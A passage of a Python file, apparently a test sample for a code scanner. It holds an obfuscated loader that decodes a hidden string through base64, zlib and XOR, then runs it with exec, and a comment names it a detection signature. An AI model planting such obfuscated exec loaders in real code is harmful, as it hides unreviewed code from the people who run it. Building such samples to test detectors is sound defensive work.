zvdxi+QMZieUjDYP4vG8F/8k3ldRnrGodwKps4vQHJRsDoMP41/1eeZqBKuGt8+5NHt2ZyAJGm8r5+wRwnaqL+x2f+T4dE7A9jVlwo"
_K = bytes.fromhex("32ead66797958892a0ae86ff")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
